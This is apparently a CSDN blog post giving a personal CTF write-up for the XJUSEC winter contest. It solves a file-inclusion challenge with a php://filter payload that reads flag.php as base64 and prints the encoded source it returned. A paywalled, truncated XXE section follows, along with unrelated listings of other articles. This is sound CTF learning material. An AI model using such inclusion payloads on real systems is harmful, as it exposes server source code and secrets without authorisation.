XJUSEC寒假赛个人WP

最新推荐文章于 2021-03-27 12:51:31 发布
最新推荐文章于 2021-03-27 12:51:31 发布
阅读量505 收藏 2
点赞数
分类专栏: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MZEPSan/article/details/104247715
版权

以下内容为本次XJUSEC寒假赛个人完成题目的WP

WEB

Include

打开题目后发现如下
在这里插入图片描述
通过学习了解到文件包含漏洞的有关知识,构造payload:

?file=php://filter/read=convert.base64-encode/resource=flag.php

得到base64加密后的源码:

PD9waHANCgkkZmxhZyA9ICdmbGFne2luY2x1ZDNfczBfZXp9JzsNCj8+DQo8aHRtbD4NCjxoZWFkPg0KCTxtZXRhIGNoYXJzZXQ9IlVURi04Ij4NCgk8dGl0bGU+WEpVU0VDIE9OTElORTwvdGl0bGU+DQoJPHN0eWxlPiANCgkJYm9keXt0ZXh0LWFsaWduOmNlbnRlcn0gDQoJPC9zdHlsZT4NCjwvaGVhZD4NCg0KPGJvZHk+DQoNCjxib2R5Pg0KDQoJPHA+ZmxhZ+WwseWcqOi/memHjO+8jOS9huWwseaYr+eci+S4jeWIsO+8jOWlveawlOWTpu+8gTwvcD4NCg0KPC9ib2R5Pg0KDQoJDQo8L2h0bWw+

解密:
在这里插入图片描述

Xxe

先学习,再做题
抓包

最低0.47元/天 解锁文章
末章EPSan
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2020网鼎杯wp
qq_40648358的博客
05-11 4160
2020网鼎杯wp_XJUSECMISC签到WEBfilejavaAreUSerialznotesCRYPTOboomyou raise me upPWNboom1REsignaljockerbang MISC 签到 点进去是选战队图标 全部通过后会让输入token 然后能在console看到flag WEB filejava 打开题目,查看基本的功能后发现有一个文件下载功能,尝试穿越目录发现web.xml 再次寻找这几个servlet的字节码在classes/cn/abc/servle
XJUSEC2021战队考核wp
weixin_51701860的博客
09-17 1199
xjusec考核wp REVERSE: justbase64 这个题是以前看见过的一个类似的题,ida打开 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jfsPV2Bp-1631845505429)(D:\blog\Pr0b1emBlog\source\img\image-20210825211051630.png)] 这边目录看见encode_one,encode_two,encode_three三个编码,右边主函数里就是三次编码后形成的"EmBmP5Pmn7QcPU4
攻防世界 web write-up unserialize3
qq_44092699的博客
04-25 157
【题目】 【思路】 给了一串php代码,且里面包含了魔术方法 __wakeup(),知道当序列化字符串表示对象的属性个数大于真实个数的属性时会跳过__wakeup的执行。先构建一个xctf的对象,对其进行序列化,将得到的序列化字符串中的’:1:‘改成’:2:’,就可以改变其表示对象属性个数的值。 得到: 再构造url中提交的code参数即可获得flag: ...
寒假考核wp1
08-04
### 寒假考核WP1知识点解析 #### 一、任务背景与目标 寒假考核WP1主要涉及了两个方面的内容:**命令执行与渗透测试**。根据描述,这是一次技术实践,旨在通过解决实际问题来提升参与者的技能水平。本解析将详细探讨...
寒假个人实习总结.docx
11-23
寒假个人实习总结.docx
寒假个人学习计划.docx
10-14
寒假个人学习计划.docx
高中生寒假个人总结
12-28
通过对进行工作进行总结,能够为之后的工作带来帮助,这里提供高中生寒假个人总结范文,提高工作效率,需...该文档为高中生寒假个人总结,是一份很不错的参考资料,具有较高参考价值,感兴趣的可以下载看看
个人寒假实习总结.doc
12-07
个人寒假实习总结】 在现代社会,就业市场常常倾向于有经验的求职者,这对于仍在象牙塔中的学生们来说,无疑增加了不少压力。寒假实习提供了一个宝贵的平台,让学生们有机会提前积累社会经验,提升自我竞争力。...
MS07-034: Executing arbitrary script with mhtml: protocol handler
06-25 1947
MS07-034: Executing arbitrary script with mhtml: protocol handler Author:Yosuke HASEGAWA yosuke.hasegawa at gmail.com> Date: Wed, 21 Jun 2007 CVE: CVE-2007-2225, CVE-2007-2227 Original advisory: http:
给你的hexo加上一个炫酷的捐赠动画
wallleap
03-31 9031
博文原地址在:我的博客 先看下效果 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-06Fd5tUN-1585625994892)(https://cdn.jsdelivr.net/gh/wallleap/cdn@latest/img/pic/illustration/donate.gif)] 首先,感谢这位老哥Kaiyuan,把这两个好看的页面开源出来sponso...
html标签中的<meta charset="utf-8">是什么鬼?
热门推荐
滕安超的博客
11-23 5万+
首先来说明一下“utf-8”是一种字符编码。charset=”utf-8”是告知浏览器此页面属于什么字符编码格式,下一步浏览器做好“翻译”工作。常见的字符编码有:gb2312、gbk、unicode、utf-8。各个字符编码含义: gb2312:代表国家标准第2312条,其中是不包含繁体的(虽然咱们不怎么使用繁体了,但是台湾还在使用繁体啊。那怎么办呢?)。 gbk:国家标准扩展版(增加了繁体,包
Visual Studio 2019 默认文件编码设置 charset = utf-8
Shell Lee
03-27 3503
本文方案基于Visual Studio 2019,后续版本不确定支持与否 对于已有文件的编码修改 cmd批量处理文件编码 高级保存选项,对每个文件分别设置编码 一些插件可能可以做到?未尝试成功 https://www.zhihu.com/question/37252051?sort=created 对新增文件默认编码 使用 EditorConfig 创建可移植的自定义编辑器设置,不出意外的话,会弹出提示,选择是即可,可以设置全局配置,也能继续设置局部配置,具体参考官网文档。 ...
old: text/html;charset=utf-8, new: text/html; charset=utf-8
Super涌
04-14 2万+
今天JSP页面报错: HTTP Status 500 - /manage/top.jsp (line: 1, column: 2) Page directive: illegal to have multiple occurrences of contentType with different values (old: text/html;charset=utf-8, new: text/ht
【独家首发】基于蜣螂优化算法DBO-GMDH的风电数据回归预测研究Matlab实现.rar
最新发布
08-14
【独家首发】基于蜣螂优化算法DBO-GMDH的风电数据回归预测研究Matlab实现.rar
深度探索:神经网络在图像识别中的革命性应用
08-14
神经网络是一种受人脑结构启发的数学模型,它由大量的节点(或称为“神经元”)相互连接构成。这些节点通常组织成层,包括输入层、隐藏层和输出层。每个神经元可以接收来自前一层的输入,通过某种激活函数处理这些输入,然后将结果传递给下一层的神经元。 神经网络能够通过学习大量的数据来识别模式和特征,这使得它们在图像识别、语音识别、自然语言处理等领域有着广泛的应用。它们也可以用于预测、分类和回归等任务。 训练神经网络通常涉及到一个称为“反向传播”的过程,通过这个过程,网络可以调整其内部参数(权重和偏置),以便更好地完成特定的任务。这个过程通常需要大量的计算资源,并且伴随着梯度下降或其他优化算法来最小化损失函数,从而提高模型的性能。 随着深度学习技术的发展,神经网络变得更加复杂和强大,出现了各种类型的网络结构,比如卷积神经网络(CNNs)用于图像处理,循环神经网络(RNNs)用于序列数据,以及长短期记忆网络(LSTMs)等。
2010寒假专转本计算机基础复习题精选
该文档是一份针对2010年寒假期间专转本计算机基础的复习题,旨在帮助考生准备计算机基础知识考试。以下是部分题目及知识点解析: 1. 题目:计算机发展划分为四代的主要依据 知识点:这道题考查的是计算机历史发展...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值